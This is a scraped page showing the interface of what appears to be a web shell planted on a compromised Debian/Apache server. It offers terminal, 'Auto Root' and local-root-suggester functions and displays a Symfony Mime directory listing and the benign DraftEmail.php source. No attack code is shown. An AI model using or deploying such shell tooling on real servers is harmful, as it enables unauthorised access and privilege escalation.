Linux vmi2545633.contaboserver.net 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64
Apache/2.4.62 (Debian)
Server IP : 127.0.0.1 & Your IP : 127.0.0.1
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
softmedya.net /
vendor /
symfony /
mime /
Delete
Unzip
Name
Size
Permission
Date
Action
Crypto
[ DIR ]
drwxr-xr-x
2025-09-16 08:38
DependencyInjection
[ DIR ]
drwxr-xr-x
2025-09-16 08:38
Encoder
[ DIR ]
drwxr-xr-x
2025-09-16 08:38
Exception
[ DIR ]
drwxr-xr-x
2025-09-16 08:38
Header
[ DIR ]
drwxr-xr-x
2025-09-16 08:38
HtmlToTextConverter
[ DIR ]
drwxr-xr-x
2025-09-16 08:38
Part
[ DIR ]
drwxr-xr-x
2025-09-16 08:38
Resources
[ DIR ]
drwxr-xr-x
2025-09-16 08:38
Test
[ DIR ]
drwxr-xr-x
2025-09-16 08:38
Address.php
4.44
KB
-rw-r--r--
2025-09-16 08:38
BodyRendererInterface.php
418
B
-rw-r--r--
2025-09-16 08:38
CHANGELOG.md
1.12
KB
-rw-r--r--
2025-09-16 08:38
CharacterStream.php
9.13
KB
-rw-r--r--
2025-09-16 08:38
DraftEmail.php
1.1
KB
-rw-r--r--
2025-09-16 08:38
Email.php
14.98
KB
-rw-r--r--
2025-09-16 08:38
FileBinaryMimeTypeGuesser.php
2.37
KB
-rw-r--r--
2025-09-16 08:38
FileinfoMimeTypeGuesser.php
1.96
KB
-rw-r--r--
2025-09-16 08:38
LICENSE
1.04
KB
-rw-r--r--
2025-09-16 08:38
Message.php
4.33
KB
-rw-r--r--
2025-09-16 08:38
MessageConverter.php
5.04
KB
-rw-r--r--
2025-09-16 08:38
MimeTypeGuesserInterface.php
826
B
-rw-r--r--
2025-09-16 08:38
MimeTypes.php
191.01
KB
-rw-r--r--
2025-09-16 08:38
MimeTypesInterface.php
777
B
-rw-r--r--
2025-09-16 08:38
README.md
459
B
-rw-r--r--
2025-09-16 08:38
RawMessage.php
2.38
KB
-rw-r--r--
2025-09-16 08:38
composer.json
1.42
KB
-rw-r--r--
2025-09-16 08:38
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Mime; use Symfony\Component\Mime\Header\Headers; use Symfony\Component\Mime\Part\AbstractPart; /** * @author Kevin Bond <kevinbond@gmail.com> */ class DraftEmail extends Email { public function __construct(?Headers $headers = null, ?AbstractPart $body = null) { parent::__construct($headers, $body); $this->getHeaders()->addTextHeader('X-Unsent', '1'); } /** * Override default behavior as draft emails do not require From/Sender/Date/Message-ID headers. * These are added by the client that actually sends the email. */ public function getPreparedHeaders(): Headers { $headers = clone $this->getHeaders(); if (!$headers->has('MIME-Version')) { $headers->addTextHeader('MIME-Version', '1.0'); } $headers->remove('Bcc'); return $headers; } }